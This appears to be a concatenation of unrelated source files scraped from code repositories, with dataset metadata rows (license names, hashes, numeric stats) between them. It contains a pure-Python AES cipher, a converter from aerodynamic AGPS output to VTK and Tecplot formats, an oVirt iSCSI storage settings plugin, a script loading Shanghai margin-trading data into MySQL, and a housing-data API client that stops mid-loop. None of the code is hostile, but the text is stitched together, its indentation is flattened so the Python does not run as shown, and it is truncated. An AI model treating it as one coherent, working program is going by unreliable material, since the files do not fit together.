well with the Stick Figure Guide to AES:
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Contrary to intuition, this implementation numbers the 4x4 matrices from top to
bottom for efficiency reasons::
0 4 8 12
1 5 9 13
2 6 10 14
3 7 11 15
Effectively it's the transposition of what you'd expect. This actually makes
the code simpler -- except the ShiftRows step, but hopefully the explanation
there clears it up.
"""
####
# Copyright (c) 2010 Marti Raudsepp <marti@juffo.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
####
from array import array
# Globals mandated by PEP 272:
# http://www.python.org/dev/peps/pep-0272/
MODE_ECB = 1
MODE_CBC = 2
#MODE_CTR = 6
block_size = 16
# variable length key: 16, 24 or 32 bytes
key_size = None
class AESDecrypter():
MODE_CBC=2
def new(self, key, mode, IV=None):
if mode == MODE_ECB:
return ECBMode(AES(key))
elif mode == MODE_CBC:
if IV is None:
raise ValueError("CBC mode needs an IV value!")
return CBCMode(AES(key), IV)
else:
raise NotImplementedError
#### AES cipher implementation
class AES(object):
block_size = 16
def __init__(self, key):
self.setkey(key)
def setkey(self, key):
"""Sets the key and performs key expansion."""
self.key = key
self.key_size = len(key)
if self.key_size == 16:
self.rounds = 10
elif self.key_size == 24:
self.rounds = 12
elif self.key_size == 32:
self.rounds = 14
else:
raise ValueError("Key length must be 16, 24 or 32 bytes")
self.expand_key()
def expand_key(self):
"""Performs AES key expansion on self.key and stores in self.exkey"""
# The key schedule specifies how parts of the key are fed into the
# cipher's round functions. "Key expansion" means performing this
# schedule in advance. Almost all implementations do this.
#
# Here's a description of AES key schedule:
# http://en.wikipedia.org/wiki/Rijndael_key_schedule
# The expanded key starts with the actual key itself
exkey = array('B', self.key)
# extra key expansion steps
if self.key_size == 16:
extra_cnt = 0
elif self.key_size == 24:
extra_cnt = 2
else:
extra_cnt = 3
# 4-byte temporary variable for key expansion
word = exkey[-4:]
# Each expansion cycle uses 'i' once for Rcon table lookup
for i in xrange(1, 11):
#### key schedule core:
# left-rotate by 1 byte
word = word[1:4] + word[0:1]
# apply S-box to all bytes
for j in xrange(4):
word[j] = aes_sbox[word[j]]
# apply the Rcon table to the leftmost byte
word[0] ^= aes_Rcon[i]
#### end key schedule core
for z in xrange(4):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
# Last key expansion cycle always finishes here
if len(exkey) >= (self.rounds + 1) * self.block_size:
break
# Special substitution step for 256-bit key
if self.key_size == 32:
for j in xrange(4):
# mix in bytes from the last subkey XORed with S-box of
# current word bytes
word[j] = aes_sbox[word[j]] ^ exkey[-self.key_size + j]
exkey.extend(word)
# Twice for 192-bit key, thrice for 256-bit key
for z in xrange(extra_cnt):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
self.exkey = exkey
def add_round_key(self, block, round):
"""AddRoundKey step. This is where the key is mixed into plaintext"""
offset = round * 16
exkey = self.exkey
for i in xrange(16):
block[i] ^= exkey[offset + i]
#print 'AddRoundKey:', block
def sub_bytes(self, block, sbox):
"""
SubBytes step, apply S-box to all bytes
Depending on whether encrypting or decrypting, a different sbox array
is passed in.
"""
for i in xrange(16):
block[i] = sbox[block[i]]
#print 'SubBytes :', block
def shift_rows(self, b):
"""
ShiftRows step in AES.
Shifts 2nd row to left by 1, 3rd row by 2, 4th row by 3
Since we're performing this on a transposed matrix, cells are numbered
from top to bottom first::
0 4 8 12 -> 0 4 8 12 -- 1st row doesn't change
1 5 9 13 -> 5 9 13 1 -- row shifted to left by 1 (wraps around)
2 6 10 14 -> 10 14 2 6 -- shifted by 2
3 7 11 15 -> 15 3 7 11 -- shifted by 3
"""
b[1], b[5], b[9], b[13] = b[5], b[9], b[13], b[1]
b[2], b[6], b[10], b[14] = b[10], b[14], b[2], b[6]
b[3], b[7], b[11], b[15] = b[15], b[3], b[7], b[11]
#print 'ShiftRows :', b
def shift_rows_inv(self, b):
"""
Similar to shift_rows above, but performed in inverse for decryption.
"""
b[5], b[9], b[13], b[1] = b[1], b[5], b[9], b[13]
b[10], b[14], b[2], b[6] = b[2], b[6], b[10], b[14]
b[15], b[3], b[7], b[11] = b[3], b[7], b[11], b[15]
#print 'ShiftRows :', b
def mix_columns(self, block):
"""MixColumns step. Mixes the values in each column"""
# Cache global multiplication tables (see below)
mul_by_2 = gf_mul_by_2
mul_by_3 = gf_mul_by_3
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_by_2[v0] ^ v3 ^ v2 ^ mul_by_3[v1]
block[col + 1] = mul_by_2[v1] ^ v0 ^ v3 ^ mul_by_3[v2]
block[col + 2] = mul_by_2[v2] ^ v1 ^ v0 ^ mul_by_3[v3]
block[col + 3] = mul_by_2[v3] ^ v2 ^ v1 ^ mul_by_3[v0]
#print 'MixColumns :', block
def mix_columns_inv(self, block):
"""
Similar to mix_columns above, but performed in inverse for decryption.
"""
# Cache global multiplication tables (see below)
mul_9 = gf_mul_by_9
mul_11 = gf_mul_by_11
mul_13 = gf_mul_by_13
mul_14 = gf_mul_by_14
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_14[v0] ^ mul_9[v3] ^ mul_13[v2] ^ mul_11[v1]
block[col + 1] = mul_14[v1] ^ mul_9[v0] ^ mul_13[v3] ^ mul_11[v2]
block[col + 2] = mul_14[v2] ^ mul_9[v1] ^ mul_13[v0] ^ mul_11[v3]
block[col + 3] = mul_14[v3] ^ mul_9[v2] ^ mul_13[v1] ^ mul_11[v0]
#print 'MixColumns :', block
def encrypt_block(self, block):
"""Encrypts a single block. This is the main AES function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, 0)
for round in xrange(1, self.rounds):
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
self.mix_columns(block)
self.add_round_key(block, round)
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
# no mix_columns step in the last round
self.add_round_key(block, self.rounds)
def decrypt_block(self, block):
"""Decrypts a single block. This is the main AES decryption function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, self.rounds)
# count rounds down from (self.rounds) ... 1
for round in xrange(self.rounds - 1, 0, -1):
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, round)
self.mix_columns_inv(block)
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, 0)
# no mix_columns step in the last round
#### ECB mode implementation
class ECBMode(object):
"""Electronic CodeBook (ECB) mode encryption.
Basically this mode applies the cipher function to each block individually;
no feedback is done. NB! This is insecure for almost all purposes
"""
def __init__(self, cipher):
self.cipher = cipher
self.block_size = cipher.block_size
def ecb(self, data, block_func):
"""Perform ECB mode with the given function"""
if len(data) % self.block_size != 0:
raise ValueError("Input length must be multiple of 16")
block_size = self.block_size
data = array('B', data)
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
block_func(block)
data[offset:offset + block_size] = block
return data.tostring()
def encrypt(self, data):
"""Encrypt data in ECB mode"""
return self.ecb(data, self.cipher.encrypt_block)
def decrypt(self, data):
"""Decrypt data in ECB mode"""
return self.ecb(data, self.cipher.decrypt_block)
#### CBC mode
class CBCMode(object):
"""
Cipher Block Chaining(CBC) mode encryption. This mode avoids content leaks.
In CBC encryption, each plaintext block is XORed with the ciphertext block
preceding it; decryption is simply the inverse.
"""
# A better explanation of CBC can be found here:
# http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#-
# Cipher-block_chaining_.28CBC.29
def __init__(self, cipher, IV):
self.cipher = cipher
self.block_size = cipher.block_size
self.IV = array('B', IV)
def encrypt(self, data):
"""Encrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Plaintext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
# Perform CBC chaining
for i in xrange(block_size):
block[i] ^= IV[i]
self.cipher.encrypt_block(block)
data[offset:offset + block_size] = block
IV = block
self.IV = IV
return data.tostring()
def decrypt(self, data):
"""Decrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Ciphertext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
ctext = data[offset:offset + block_size]
block = ctext[:]
self.cipher.decrypt_block(block)
# Perform CBC chaining
#for i in xrange(block_size):
# data[offset + i] ^= IV[i]
for i in xrange(block_size):
block[i] ^= IV[i]
data[offset:offset + block_size] = block
IV = ctext
#data[offset : offset+block_size] = block
self.IV = IV
return data.tostring()
def galois_multiply(a, b):
"""Galois Field multiplicaiton for AES"""
p = 0
while b:
if b & 1:
p ^= a
a <<= 1
if a & 0x100:
a ^= 0x1b
b >>= 1
return p & 0xff
# Precompute the multiplication tables for encryption
gf_mul_by_2 = array('B', [galois_multiply(x, 2) for x in range(256)])
gf_mul_by_3 = array('B', [galois_multiply(x, 3) for x in range(256)])
# ... for decryption
gf_mul_by_9 = array('B', [galois_multiply(x, 9) for x in range(256)])
gf_mul_by_11 = array('B', [galois_multiply(x, 11) for x in range(256)])
gf_mul_by_13 = array('B', [galois_multiply(x, 13) for x in range(256)])
gf_mul_by_14 = array('B', [galois_multiply(x, 14) for x in range(256)])
####
# The S-box is a 256-element array, that maps a single byte value to another
# byte value. Since it's designed to be reversible, each value occurs only once
# in the S-box
#
# More information: http://en.wikipedia.org/wiki/Rijndael_S-box
aes_sbox = array(
'B',
'637c777bf26b6fc53001672bfed7ab76'
'ca82c97dfa5947f0add4a2af9ca472c0'
'b7fd9326363ff7cc34a5e5f171d83115'
'04c723c31896059a071280e2eb27b275'
'09832c1a1b6e5aa0523bd6b329e32f84'
'53d100ed20fcb15b6acbbe394a4c58cf'
'd0efaafb434d338545f9027f503c9fa8'
'51a3408f929d38f5bcb6da2110fff3d2'
'cd0c13ec5f974417c4a77e3d645d1973'
'60814fdc222a908846eeb814de5e0bdb'
'e0323a0a4906245cc2d3ac629195e479'
'e7c8376d8dd54ea96c56f4ea657aae08'
'ba78252e1ca6b4c6e8dd741f4bbd8b8a'
'703eb5664803f60e613557b986c11d9e'
'e1f8981169d98e949b1e87e9ce5528df'
'8ca1890dbfe6426841992d0fb054bb16'.decode('hex')
)
# This is the inverse of the above. In other words:
# aes_inv_sbox[aes_sbox[val]] == val
aes_inv_sbox = array(
'B',
'52096ad53036a538bf40a39e81f3d7fb'
'7ce339829b2fff87348e4344c4dee9cb'
'547b9432a6c2233dee4c950b42fac34e'
'082ea16628d924b2765ba2496d8bd125'
'72f8f66486689816d4a45ccc5d65b692'
'6c704850fdedb9da5e154657a78d9d84'
'90d8ab008cbcd30af7e45805b8b34506'
'd02c1e8fca3f0f02c1afbd0301138a6b'
'3a9111414f67dcea97f2cfcef0b4e673'
'96ac7422e7ad3585e2f937e81c75df6e'
'47f11a711d29c5896fb7620eaa18be1b'
'fc563e4bc6d279209adbc0fe78cd5af4'
'1fdda8338807c731b11210592780ec5f'
'60517fa919b54a0d2de57a9f93c99cef'
'a0e03b4dae2af5b0c8ebbb3c83539961'
'172b047eba77d626e169146355210c7d'.decode('hex')
)
# The Rcon table is used in AES's key schedule (key expansion)
# It's a pre-computed table of exponentation of 2 in AES's finite field
#
# More information: http://en.wikipedia.org/wiki/Rijndael_key_schedule
aes_Rcon = array(
'B',
'8d01020408102040801b366cd8ab4d9a'
'2f5ebc63c697356ad4b37dfaefc59139'
'72e4d3bd61c29f254a943366cc831d3a'
'74e8cb8d01020408102040801b366cd8'
'ab4d9a2f5ebc63c697356ad4b37dfaef'
'c5913972e4d3bd61c29f254a943366cc'
'831d3a74e8cb8d01020408102040801b'
'366cd8ab4d9a2f5ebc63c697356ad4b3'
'7dfaefc5913972e4d3bd61c29f254a94'
'3366cc831d3a74e8cb8d010204081020'
'40801b366cd8ab4d9a2f5ebc63c69735'
'6ad4b37dfaefc5913972e4d3bd61c29f'
'254a943366cc831d3a74e8cb8d010204'
'08102040801b366cd8ab4d9a2f5ebc63'
'c697356ad4b37dfaefc5913972e4d3bd'
'61c29f254a943366cc831d3a74e8cb'.decode('hex')
)
|
gpl-3.0
| -5,658,260,328,799,054,000
| 31.6778
| 79
| 0.61045
| false
| 3.159574
| false
| false
| false
|
SaTa999/pyPanair
|
pyPanair/postprocess/agps_converter.py
|
1
|
10619
|
#!/usr/bin/env python
import numpy as np
import os
def read_column(file, firstline):
"""read a column from first line (e.g. n01c001) to *eof"""
column = list()
line = firstline
# register methods for faster evaluation
f_readline = file.readline
column_append = column.append
# read each line until *eof
while line:
line = f_readline().split()
if line[0] == "*eof":
break
column_append(line)
return column
def read_network(file, header):
"""read a network"""
network_n = int(header[0][1:3]) # get network number from the first header (e.g. 01 from n01c001)
# print("loading network no.", network_n)
network = list()
line = header
# register methods for faster evaluation
network_append = network.append
# read each line until next header
while line:
col = read_column(file, line)
network_append(col)
line = file.readline().split()
# break at the end of agps file
if not line:
break
# break when reaching the header for the next network (e.g. n02c001)
if not int(line[0][1:3]) == network_n:
break
network = np.array(network, dtype=float)
return network, line
def read_agps(inputfile="agps"):
# read the agps file and return a list of arrays containing data for each network
with open(inputfile, "r") as f:
# skip the header of the agps file
for _ in range(6):
f.readline()
line = f.readline().split()
f.readline() # skip the header of first network ("icol, x, y, z, cp1, cp2, cp3, cp4")
dat = []
while line:
net, line = read_network(f, line)
dat.append(net)
return dat
def write_vtk(n_wake=0, outputname="agps", inputfile="agps"):
"""Write agps in the legacy paraview format (vtk)
All networks will be merged into one block
Therefore, user are advised to omit 'wakes' by specifying the 'n_wakes'"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write the header of the vtk file
vtk = "# vtk DataFile Version 2.0\n"
vtk += "scalar\n"
vtk += "ASCII\n"
vtk += "DATASET UNSTRUCTURED_GRID\n"
n_points = 0 # number of points in vtk file
n_cells = 0 # number of quadrilateral cells formed by the points
n_cp = data[0].shape[2] - 4
points = str() # coordinate of each point (x, y, z)
point_data = [str()] * n_cp # cp at each point (cp1, cp2, cp3, cp4)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
for i in range(len(data) - n_wake):
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
base_square = np.array((0, n_col, n_col + 1, 1))
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add cp data of a point
for l in range(n_cp):
point_data[l] += "{}\n".format(point[4 + l])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k) + n_points
square = (str(p) for p in square)
cells += "4 " + " ".join(square) + "\n"
# add the number of points / cells
n_points += n_row * n_col
n_cells += (n_row - 1) * (n_col - 1)
# write the header of each block (POINTS, CELLS, CELLTYPES, POINT_DATA)
points = "POINTS {} float\n".format(n_points) + points
cells = "CELLS {0} {1}\n".format(n_cells, n_cells * 5) + cells
cell_types = "CELL_TYPES {}\n".format(n_cells) + "9\n" * n_cells
vtk += points + cells + cell_types + "POINT_DATA {}\n".format(n_points)
for l in range(n_cp):
vtk += "SCALARS cp{} float\nLOOKUP_TABLE default\n".format(l + 1) + point_data[l]
with open("{}.vtk".format(outputname), "w") as f:
f.write(vtk)
def write_vtm(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to paraview unstructured grid
each network will become a different vtu file
to open all vtu files at the same time, open the vtm file with paraview"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header of vtm file
vtm = "<?xml version=\"1.0\"?>\n"
vtm += "<VTKFile type=\"vtkMultiBlockDataSet\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtm += " <vtkMultiBlockDataSet>\n"
for i in range(len(data) - n_wake):
# add dataset to vtm file
vtu_dir = "{}_vtu".format(outputname)
try:
os.mkdir(vtu_dir)
except OSError:
if not os.path.exists(vtu_dir):
raise
vtu_path = "{0}/{1}{2}.vtu".format(vtu_dir, outputname, i + 1)
vtm += " <DataSet index=\"network{0}\" file=\"{1}\"/>\n".format(i + 1, vtu_path)
# write header of vtu file
vtu = "<?xml version=\"1.0\"?>\n"
vtu += "<VTKFile type=\"UnstructuredGrid\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtu += " <UnstructuredGrid>\n"
# write the header of the piece
net = data[i]
n_cp = net.shape[2] - 4
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i), net.shape)
n_points = n_row * n_col
n_cells = (n_row - 1) * (n_col - 1)
vtu += " <Piece NumberOfPoints=\"{}\" NumberOfCells=\"{}\">\n".format(n_points, n_cells)
# format the agps data
points = str() # coordinate of each point (x, y, z)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
base_square = np.array((0, n_col, n_col + 1, 1), dtype=int)
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k)
square = (str(p) for p in square)
cells += " ".join(square) + "\n"
# add formatted agps data to vtu
vtu += " <PointData Scalars=\"scalars\">\n"
# add point_data to vtu
for l in range(n_cp):
vtu += " <DataArray type=\"Float32\" Name=\"cp{}\" format=\"ascii\">\n".format(l + 1)
vtu += " ".join(str(cp) for cp in net[:, :, 4 + l].ravel()) + "\n"
vtu += " </DataArray>\n"
vtu += " </PointData>\n"
# add points to vtu
vtu += " <Points>\n"
vtu += " <DataArray type=\"Float32\" Name=\"network{}\" NumberOfComponents=\"3\" " \
"format=\"ascii\">\n".format(i + 1)
vtu += points
vtu += " </DataArray>\n"
vtu += " </Points>\n"
# add cells to vtu
vtu += " <Cells>\n"
vtu += " <DataArray type=\"Int32\" Name=\"connectivity\" format=\"ascii\">\n"
vtu += cells
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"offsets\" format=\"ascii\">\n"
vtu += " ".join(str(4 * (icell + 1)) for icell in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"types\" format=\"ascii\">\n"
vtu += " ".join(str(9) for _ in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " </Cells>\n"
vtu += " </Piece>\n"
vtu += " </UnstructuredGrid>\n</VTKFile>\n"
with open(vtu_path, "w") as f:
f.write(vtu)
vtm += " </vtkMultiBlockDataSet>\n</VTKFile>"
with open("{}.vtm".format(outputname), "w") as f:
f.write(vtm)
def write_tec(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to tecplot finite element quadrilaterals"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header
n_headers = data[0].shape[2] # number of headers (e.g. 8 for "irow, x, y, z, cp1, cp2, cp3, cp4")
n_cp = n_headers - 4 # number of different cps in agps file
tec = "TITLE = \"AGPS 3D Finite Element Data\"\n"
tec += "VARIABLES = \"x\", \"y\", \"z\""
for i in range(n_cp):
tec += ", \"cp{}\"".format(i + 1)
tec += "\n"
# write each network as a block
for i in range(len(data) - n_wake):
# write the header of the block
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
n_points = n_row * n_col
n_elements = (n_row - 1) * (n_col - 1)
tec += "ZONE T=\"MIXED\", N={}, E={}, DATAPACKING=BLOCK," \
" ZONETYPE=FEQUADRILATERAL\n".format(n_points, n_elements)
# write coordinates (x, y, z) and cps (cp1, cp2, cp3, cp4) in each row
for l in range(1, n_headers):
element = net[:, :, l]
tec += " ".join(map(str, element.ravel())) + "\n"
# write the ids of each quadrilateral (e.g. (0, n_col, n_col + 1, 1) for first quadrilateral)
base_square = np.array((0, n_col, n_col + 1, 1)) + 1
# quads = str()
# for j in range(n_row-1):
# for k in range(n_col-1):
# square = base_square + (j * n_col + k)
# square = (str(p) for p in square)
# quads += " ".join(square) + "\n"
# same as the above code, but faster evaluation
quads = "\n".join("\n".join((" ".join((str(p) for p in (base_square + j * n_col + k))))
for k in range(n_col - 1))
for j in range(n_row - 1))
tec += quads
with open("{}.dat".format(outputname), "w") as f:
f.write(tec)
|
mit
| 7,905,887,637,318,669,000
| 41.880165
| 104
| 0.512289
| false
| 3.272419
| false
| false
| false
|
jarod-w/ocsetup
|
ocsetup/plugins/storage_tab.py
|
1
|
2968
|
#!/usr/bin/python
# storage_tab.py - Copyright (C) 2012 CloudTimes, Inc.
# Written by Jarod.W <work.iec23801@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA. A copy of the GNU General Public License is
# also available at http://www.gnu.org/copyleft/gpl.html.
import traceback
from ovirtnode.ovirtfunctions import log
from ovirtnode.iscsi import get_current_iscsi_initiator_name, \
set_iscsi_initiator
from ocsetup.wrapper_ovirtfunctions import PluginBase
from ocsetup.ocsetup_ui_widgets import ButtonList
from ocsetup.ocsetup_ui import WidgetBase, _
from ocsetup.datautil import refresh_window
class Plugin(PluginBase):
"""
Plugin for license information of IVNH.
"""
def __init__(self):
PluginBase.__init__(self, "Storage")
self.iscsi_initiator_label = None
self.iscsi_initiator_name_value = None
self.iscsi_button = None
def storage_apply(self, obj):
from ocsetup.ocsetup import ocs
log("enter storage apply")
set_iscsi_initiator(
ocs.page_Storage.iscsi_initiator_name_value_Entry.get_text())
def storage_reset(self, obj):
log("enter storage reset")
refresh_window(obj)
def form(self):
log("enter storage form function....")
try:
self.iscsi_initiator_label = WidgetBase(
"iscsi_initiator_label",
"Label",
"iSCSI Initiator Name:",
title=True)
self.iscsi_initiator_name_value = WidgetBase(
"iscsi_initiator_name_value", "Entry", "", "",
get_conf=get_current_iscsi_initiator_name)
self.iscsi_button = WidgetBase(
'iscsi_button', ButtonList, '',
params={'labels': [_('Apply'), _('Reset')],
'callback': [self.storage_apply, self.storage_reset]})
except:
log("Here some error happened.format ext: %s " %
traceback.format_exc())
return [
"Storage",
"Storage",
[
(self.iscsi_initiator_label, self.iscsi_initiator_name_value),
(WidgetBase('__', 'Label', vhelp=140),),
(self.iscsi_button,),
]]
def action(self):
pass
def get_plugin():
p = Plugin()
return p.form()
|
gpl-2.0
| -7,529,631,513,802,328,000
| 33.114943
| 78
| 0.627695
| false
| 4.082531
| false
| false
| false
|
cqychen/quants
|
quants/loaddata/skyeye_ods_invest_refer_sh_margins_detail.py
|
1
|
2670
|
#coding=utf8
import tushare as ts;
import pymysql;
import time as dt
from datashape.coretypes import string
from pandas.io.sql import SQLDatabase
import sqlalchemy
import datetime
from sqlalchemy import create_engine
from pandas.io import sql
import threading
import pandas as pd;
import sys
sys.path.append('../') #添加配置文件
from common_function import *
def create_table(table_name):
cmd='''
create table if not exists %s
(
opDate VARCHAR (63) comment '信用交易日期'
,stockCode varchar (63) comment '股票代码'
,securityAbbr varchar (63) comment '标的证券简称'
,rzye BIGINT comment '本日融资余额(元)'
,rzmre BIGINT comment '本日融资买入额(元)'
,rzche BIGINT comment '本日融资偿还额(元)'
,rqyl BIGINT comment '本日融券余量'
,rqmcl BIGINT comment '本日融券卖出量'
,rqchl BIGINT comment '本日融券偿还量'
,PRIMARY KEY(stockCode,`opDate`)
,index(stockCode)
)DEFAULT CHARSET=utf8
'''%table_name
print (cmd)
run_mysql_cmd(cmd,conn)
def load_data_stock(stock_code):
'''
:param stock_code:传递股票代码,将其装载进入mysql
:return:
'''
start_date = get_date_add_days(get_max_date_sh_margins_detail(stock_code), 1) #获取股票最大日期
rs = ts.sh_margin_details(start=start_date, end=end_date, symbol=stock_code)#获取数据
pd.DataFrame.to_sql(rs, table_name, con=conn, flavor='mysql', if_exists='append', index=False)
def load_data():
stock_code = get_stock_info().index
total_num = len(stock_code);
tempnum = 1;
for tmp_stock_code in stock_code:
tempnum = tempnum + 1
print(tempnum,tmp_stock_code)
load_data_stock(tmp_stock_code)
if __name__ == '__main__':
#--------------------设置基本信息---------------------------------
print("--------------加载股票日k线-----------------------------")
startTime=dt.time()
iphost,user,passwd=get_mysql_conn()
db='ods_data'
charset='utf8'
table_name='ods_invest_refer_sh_margins_detail'
conn = pymysql.connect(user=user, passwd=passwd,host=iphost, db=db,charset=charset)
end_date= dt.strftime('%Y-%m-%d',dt.localtime(dt.time()))
#--------------------脚本运行开始--------------------------------
create_table(table_name=table_name)
load_data()
endTime=dt.time()
print("---------------脚本运行完毕,共计耗费时间%sS------------------"%(endTime-startTime))
|
epl-1.0
| -4,613,820,654,172,870,000
| 34.217391
| 98
| 0.577778
| false
| 2.825581
| false
| false
| false
|
pfjel7/housing-insights
|
python/housinginsights/sources/cama.py
|
1
|
8713
|
# Script is deprecated, as of September 18, 2017.
# zoneUnitCount now calculated with LoadData's _get_residential_units()
#
from pprint import pprint
import os
import sys
import requests
from collections import OrderedDict
import csv
import datetime
PYTHON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
sys.path.append(PYTHON_PATH)
from housinginsights.sources.base import BaseApiConn
from housinginsights.tools.logger import HILogger
logger = HILogger(name=__file__, logfile="sources.log")
class MarApiConn_2(BaseApiConn):
"""
API Interface to the Master Address Record (MAR) database.
Use public methods to retrieve data.
"""
BASEURL = 'http://citizenatlas.dc.gov/newwebservices/locationverifier.asmx'
def __init__(self, baseurl=None,proxies=None,database_choice=None, debug=False):
super().__init__(MarApiConn_2.BASEURL)
def get_data(self, square, lot, suffix):
"""
Get information on a location based on a simple query string.
:param square: SSL first part
:type location: String.
:param lot: SSL second part
:type location: String.
:param output_type: Output type specified by user.
:type output_type: String.
:param output_file: Output file specified by user.
:type output_file: String
:returns: Json output from the api.
:rtype: String
"""
params = {
'f': 'json',
'Square': square,
'Lot': lot,
'Suffix': suffix
}
result = self.get('/findAddFromSSL2', params=params)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
logger.exception(err.format(result.status_code))
raise
mar_data = result.json()
if mar_data['returnDataset'] == {}:
mar_returns = {'Warning': 'No MAR data availble - property under construction - see AYB year'}
else:
entry = mar_data['returnDataset']['Table1'][0]
mar_returns = {'anc': entry['ANC'],
'census_tract': entry['CENSUS_TRACT'],
'neighborhood_cluster': entry['CLUSTER_'],
'ward': entry['WARD'],
'zip': entry['ZIPCODE']
}
return mar_returns
class CamaApiConn(BaseApiConn):
"""
API Interface to the Computer Assisted Mass Appraisal - Residential (CAMA)
API, to obtain SSL numbers to use as input for the MarApiConn_2 and get
the corresponding housing and bedroom units.
"""
BASEURL = 'https://opendata.arcgis.com/datasets'
def __init__(self):
super().__init__(CamaApiConn.BASEURL)
def get_data(self):
"""
Grabs data from CAMA. Individual CAMA property retrieves zone_type data
from MAR api. Count number of housing units and bedroom units per zone.
Return the count data (in dictionary form) to be processed into csv
by get_csv() method.
"""
logger.info("Starting CAMA")
mar_api = MarApiConn_2()
result = self.get(urlpath='/c5fb3fbe4c694a59a6eef7bf5f8bc49a_25.geojson', params=None)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
raise Exception(err.format(result.status_code))
cama_data = result.json()
logger.info(" Got cama_data. Length:{}".format(len(cama_data['features'])))
"""
Example of: anc_count = [OrderedDict([('zone_type', 'anc'), ('zone', 'ANC 2B'),
('housing_unit_count', 10), ('bedroom_unit_count', 10)], etc)]
"""
zone_types = ['anc', 'census_tract', 'neighborhood_cluster', 'ward', 'zip']
anc_count = []
census_count = []
cluster_count = []
ward_count = []
zipcode_count = []
"""
Take each CAMA property data and retrieve the MAR data.
"""
"""
Certain square values have four digits + a letter. (ex. 8888E)
Square would be the first four digits and suffix would be the letter.
SSL sometimes comes as 8 digit string without spacing in the middle.
"""
"""
CAMA data includes bldgs under construction. CAMA's data includes AYB of 2018
as of June 2017. We eliminate all data points that are under construction and
don't provide any housing units and bedrm at this time.
"""
for index, row in enumerate(cama_data['features']):
if (index % 1000 == 0):
print(" currently at index {}".format(index))
try:
current_year = int(datetime.date.today().strftime('%Y'))
#Skipping none values for units under construction
if row['properties']['AYB'] is not None and int(row['properties']['AYB']) > current_year:
continue
objectid = row['properties']['OBJECTID']
